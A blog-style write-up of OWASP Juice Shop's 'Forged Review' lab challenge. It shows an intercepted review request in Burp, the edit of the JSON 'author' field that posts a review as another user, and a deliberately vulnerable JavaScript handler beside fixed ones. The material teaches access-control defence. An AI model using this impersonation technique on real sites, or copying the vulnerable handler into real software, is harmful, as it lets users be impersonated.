Hacking OWASP’s Juice Shop Pt. 30: Forged Review

Challenge: 

Name: Forged Review

Description: Post a product review as another user or edit any user’s existing review.

Difficulty: 3 star

Category: Broken Access Control

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-access-control.html

Tools used:

Burp, FoxyProxy

Resources used:

None.

Methodology: 

This is another instance of the server trusting the identity it is handed in the JSON body instead of the identity of the logged-in user: the review's author field is sent by the client and never compared against the authenticated account. The first steps, as usual, are to log in as any user, open Burp Suite, and set up FoxyProxy to intercept the packet. Then, just fill out a review and check the packet.

[Screenshot: the "Write a review" dialog on the Banana Juice product page (1.99, Reviews (1)), with the review text "All I want is to be a monkey of moderate intelligence who wears a suit... that's why I've decided to transfer to business school." (129/160 characters) ready to submit.]

[Screenshot: the intercepted request in Burp's Proxy tab. The recoverable parts of it are:]

PUT /rest/products/6/reviews HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer [JWT omitted]
Content-Type: application/json
Origin: http://localhost:3000
Connection: close
Referer: http://localhost:3000/
Cookie: language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=[omitted]

{"message":"All I want is to be a monkey of moderate intelligence who wears a suit... that's why I've decided to transfer to business school.","author":"bender@juice-sh.op"}

Now all that needs to be done is change the author. Unfortunately Guenter doesn’t have a user account, so Amy will have to do in a pinch.

[Screenshot: the same request in Burp with the author field in the JSON body changed to "amy@juice-sh.op" before forwarding, followed by the success notification:]

You successfully solved a challenge: Forged Review (Post a product review as another user or edit any user's existing review.)

Prevention and Mitigation Strategies:

OWASP Mitigation Cheat Sheet
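The root cause and its fix, as an added example that is not Juice Shop's own code: a review handler in the vulnerable shape described above (author taken from the JSON body) beside a fixed one that takes the author only from the already-verified token and checks ownership on edit. The request/user objects, the in-memory reviews array and the replayed forged request are all constructed for the example.

```javascript
// Constructed in-memory store standing in for the reviews collection.
const reviews = [];
let nextId = 1;

// Juice Shop limits a review to 160 characters; reuse that bound here.
function validMessage(msg) {
  return typeof msg === 'string' && msg.length > 0 && msg.length <= 160;
}

// Vulnerable: author is whatever the client put in the body, so editing that
// field in Burp lets any logged-in user post a review as someone else.
function createReviewVulnerable(req, user) {
  if (!user) return { status: 401 };
  const review = { id: nextId++, product: req.params.id,
                   message: req.body.message, author: req.body.author };
  reviews.push(review);
  return { status: 201, review };
}

// Fixed: author comes only from the verified identity; body.author is ignored.
function createReviewFixed(req, user) {
  if (!user) return { status: 401 };
  if (!validMessage(req.body.message)) return { status: 400 };
  const review = { id: nextId++, product: req.params.id,
                   message: req.body.message, author: user.email };
  reviews.push(review);
  return { status: 201, review };
}

// Fixed edit: only the review's owner may change it (the second half of the
// challenge, editing another user's existing review).
function editReviewFixed(req, user) {
  if (!user) return { status: 401 };
  const review = reviews.find(r => r.id === Number(req.params.reviewId));
  if (!review) return { status: 404 };
  if (review.author !== user.email) return { status: 403 };
  if (!validMessage(req.body.message)) return { status: 400 };
  review.message = req.body.message;
  return { status: 200, review };
}

// Detection: a body author that disagrees with the token is worth logging.
function authorMismatch(req, user) {
  return typeof req.body.author === 'string' && req.body.author !== user.email;
}

// Constructed replay of the forged request: the token belongs to bender,
// the body claims amy.
const bender = { email: 'bender@juice-sh.op' };
const forged = { params: { id: '6' },
  body: { message: 'All I want is to be a monkey...', author: 'amy@juice-sh.op' } };
```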

Lessons Learned and Things Worth Mentioning:

This is my first real interaction with the NoSQL database. I’ve never used one before, so future challenges pertaining to product reviews will likely require a little bit more effort than this one does.
